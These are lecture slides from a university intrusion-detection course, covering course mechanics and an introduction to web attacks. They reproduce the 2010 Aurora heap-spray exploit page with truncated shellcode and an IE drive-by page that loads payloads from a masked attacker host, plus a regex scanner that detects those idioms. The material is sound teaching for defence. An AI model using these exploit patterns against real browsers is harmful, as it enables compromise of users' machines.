Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... ·...
ISA 674 Intrusion Detection
Angelos Stavrou, George Mason University

Introduction & Class Mechanics
Course Mechanics

- Course URL: http://cs.gmu.edu/~astavrou/isa674_F12.html
- Instructor: Angelos Stavrou
  - Email: [email protected]
  - Office: Research I, rm 437
  - Office Phone: (703) 993-3772
  - Office Hours: Wednesday 4:30 – 6:30pm and by appointment
Course Mechanics

- Course URL: http://cs.gmu.edu/~astavrou/isa673_S10.html
- TA: Rahul Murmuria
  - Email: [email protected]
  - Office: Engineering building CS TA Room
  - Office Hours: Monday, 4:00 – 6:00pm
Course Bibliography

Required:
- The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy, Patrick Engebretson. Publication date: August 4, 2011. Available from: [GMU Bookstore] [Amazon]
- Data Mining and Machine Learning in Cybersecurity, Sumeet Dua and Xian Du. Publication date: April 25, 2011. Available from: [GMU Bookstore] [Amazon]

Recommended:
- Practical Intrusion Analysis: Prevention and Detection for the Twenty-First Century, Ryan Trost. Publication date: June 24, 2009. Available from: [Online through Safari] [Amazon]
Grading

- Homework: 30%
- Midterm: 15%
- Final Class Projects: 35%
- Class Participation: 5%
- No Final Exam

This class is an upper-level class and is geared towards understanding the fundamental concepts behind Intrusion Detection for computer systems. The students will be expected to participate in large projects under the guidance of the instructor.
Course Overview

- Provide hands-on experience with fundamentals and advanced topics in Intrusion Detection
- Intrusion Detection techniques:
  - Honeypots, Logging, Monitoring
  - System Auditing – Network and Host
  - Signature-based systems: Snort, BRO, Suricata, ArcSight
  - Anomaly Detection and Data Mining
  - Advanced Topics: Peer-to-peer Botnets, Advanced Persistent Threats, Drive-by-Downloads
- Recent advanced techniques such as host-based intrusion detection, system randomization, vulnerability fingerprinting, and the combination of Network and Host approaches.
Prerequisites

- Courses
  - ISA 656 and ISA 562, or permission of instructor. The coursework will include substantial hands-on projects; in order to be able to complete the projects, students must be comfortable with using tools and Unix.
- Skills
  - Familiar or comfortable with Linux
  - Scripting and configuration of tools
  - Willingness to spend time in the lab learning about exploits, defenses, and tools
  - Being able to install programs and work in Unix
Course Topics (tentative)

- Introduction to Intrusion Detection
  - Lure the attacker to you: Honeypots and Honeyclients
  - Basic Intrusion Detection Mechanisms
- Understanding the Threats: Malware Taxonomy
  - Remote Attacks – perform one on your own
  - Advanced Persistent Threats (APT): use content
  - After the attack, what? RootKits, Back-Doors, Botnets
  - Setting up Defenses: Network & Hosts
- Post Attack Recovery: Logging, Auditing, and Data Restoration
  - Log Generation
  - Log Auditing
  - Log-based Recovery
Course Topics (tentative)

- Passive Network Intrusion Detection
  - Snort, Bro, Suricata, ArcSight
- Host Intrusion Detection
  - TripWire and Memory Randomization
- Vulnerability Analysis: Vulnerability Classification
  - Defense against Known Vulnerabilities
  - Defense against Unknown (0-day) Vulnerabilities
Course Topics (tentative)

- Malware Capture and Analysis
  - Honeypot Taxonomy
  - Recent Honeypot Advances
  - Deployment and Liabilities
- Malware
  - Polymorphic Malware
  - Malware Packers and Javascript Encoders
  - Analyzing Malware with PIN & IDA Pro
- Rootkits: Rootkit Basics
  - Advanced Rootkit Techniques
  - Rootkit Defenses
Course Schedule (Tentative)

- Please check it at least twice a week:
  http://cs.gmu.edu/~astavrou/isa674_F12.html#Schedule
Course Policies

- Academic integrity
  - If you do not cite it and you use it, you are in violation!
  - Please read!
- Unless otherwise noted, work turned in should reflect your independent capabilities
  - If unsure, note / cite sources and help
- Usually, no late submissions will be accepted
  - No penalty for documented emergency (e.g., medical) or by prior arrangement in special circumstances
Warning

- Policy on security experiments:
  - you may not break into machines that are not your own;
  - you may not attempt to attack or subvert system security on machines not owned by you.
ISA 674 Intrusion Detection

Introduction
Motivation

- Internet malware remains a top threat:
Types of Attacks

- Drive-By Malware
- Application Attacks
- Attacks enabled by access to passwords
- Heap-Spray Attacks
- Denial of service
- Spoofing
- E-mail attack
- Wireless attacks
- Malware and Malfese
- Malware Embedded Objects
Google Aurora Attack 2010

```html
<html><script>
var sc = unescape("%u9090%u19eb%u4b5b%u3390%u90c9 […]”);
var sss = Array(826, 679, … 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); }
var cc=arr.toString();
cc=cc.replace(/ ,/ g, "" );
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i < 200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ;
var e1 = null;
function ev1(evt){
  e1 = document.createEventObject(evt);
  document.getElementById("sp1").innerHTML = "";
  window.setInterval(ev2, 50);
}
function ev2(){
  p = “ \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
  for (i = 0; i < x1.length; i ++ ){ x1[i].data = p; } ;
  var t = e1.srcElement;
}
</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>
```
Similar Code Injection Examples
An Attack Incident Against IE Browser

- One click on a malicious URL: http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
- Result: MS04-013, MS03-011, MS05-002

```html
<html><head><title></title></head><body>
<style> * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} </style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
<PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET>
<script>
try{
  document.write('<object data=`ms-its: mhtml:file: //C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');
}catch(e){}
</script>
</body></html>
```
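As an added example that is not part of the slides, the following signature-style scanner (written for this page, in the spirit of the Snort/Bro content rules the course covers) flags the obfuscation and heap-spray idioms visible in the Aurora page and in this IE drive-by page: long `\uXXXX` NOP-sled strings, `%u`-encoded shellcode handed to `unescape()`, a `fromCharCode`-decoded array passed to `eval()`, the `ms-its:`/`mhtml:` protocol handlers, a CSS cursor pointing at an `.anr` file, and `document.write()` assembled from `'+'`-joined fragments. The rule names and the three sample pages are constructed for the example.

```python
import re

# Indicator rules for the idioms seen in the two exploit pages above.
# Rule names are invented for this example; each is a plain regex.
RULES = [
    # run of 16+ consecutive \uXXXX escapes: the sled string sprayed into the heap
    ("heap_spray_unicode_sled", re.compile(r"(?:\\u[0-9a-fA-F]{4}){16,}")),
    # unescape() over %uXXXX-encoded shellcode
    ("unescape_percent_u_shellcode",
     re.compile(r"unescape\(\s*['\"](?:%u[0-9a-fA-F]{4}){4,}")),
    # numeric array decoded with String.fromCharCode and then fed to eval()
    ("charcode_decode_then_eval",
     re.compile(r"String\.fromCharCode[\s\S]{0,400}?\beval\(")),
    # ms-its:/mhtml: protocol handlers used for CHM-based code execution
    ("ms_its_mhtml_protocol", re.compile(r"ms-its:|mhtml:file:", re.IGNORECASE)),
    # CSS cursor whose URL points at an animated-cursor (.anr) file
    ("css_cursor_anr", re.compile(r"cursor\s*:\s*url\([^)]*\.anr", re.IGNORECASE)),
    # document.write() built from 3+ '+'-joined fragments to defeat naive string matching
    ("split_string_document_write", re.compile(r"document\.write\((?:[^;]*?'\+'){3,}")),
]

def scan_html(html):
    """Return the sorted names of every rule that matches the page text."""
    return sorted(name for name, rx in RULES if rx.search(html))

def classify(html, threshold=2):
    """Flag a page as suspicious when at least `threshold` rules fire."""
    hits = scan_html(html)
    return ("suspicious" if len(hits) >= threshold else "clean"), hits

# Constructed sample pages (not the real pages shown on the slides).
SPRAY_SAMPLE = (
    '<script>var sc = unescape("%u9090%u9090%u9090%u9090%u9090");'
    'var a = []; for (var i = 0; i < 3; i++) { a[i] = String.fromCharCode(65); }'
    'eval(a.join("")); var p = "' + "\\u0c0d" * 20 + '";</script>'
)
IE_SAMPLE = (
    '<style> * {CURSOR: url("http://example.invalid/ads/sploit.anr")} </style>'
    "<script>try{ document.write('<object data=`ms-its:mhtml:file://C:\\fo'+'o.mht!'+"
    "'http://example.invalid/t.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');"
    "}catch(e){}</script>"
)
BENIGN_SAMPLE = '<html><body><script>document.write("hello");</script></body></html>'

if __name__ == "__main__":
    for label, page in (("spray", SPRAY_SAMPLE), ("ie", IE_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, classify(page))
```

Each rule on its own is weak (a benign page may legitimately call `eval` or `unescape`), which is why `classify` only raises a verdict when several fire together; in a real IDS these patterns would be one input to a scoring or anomaly layer rather than a block decision.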
An Attack Incident Against IE Browser

22 “unwanted” programs are installed without the user’s consent
Topology Graph of Malicious URLs

URL-level Topology Graph for WinXP SP1 Un-patched: 688 URLs from 270 sites

(Figure legend: Site nodes, URLs; Content Provider, Exploit Provider; Redirecting URL, Exploiting URL)
Motivation
Course Focus

- Understanding essential techniques behind these attacks, offensively and defensively
- Hands-on Exercises: your own working IDS!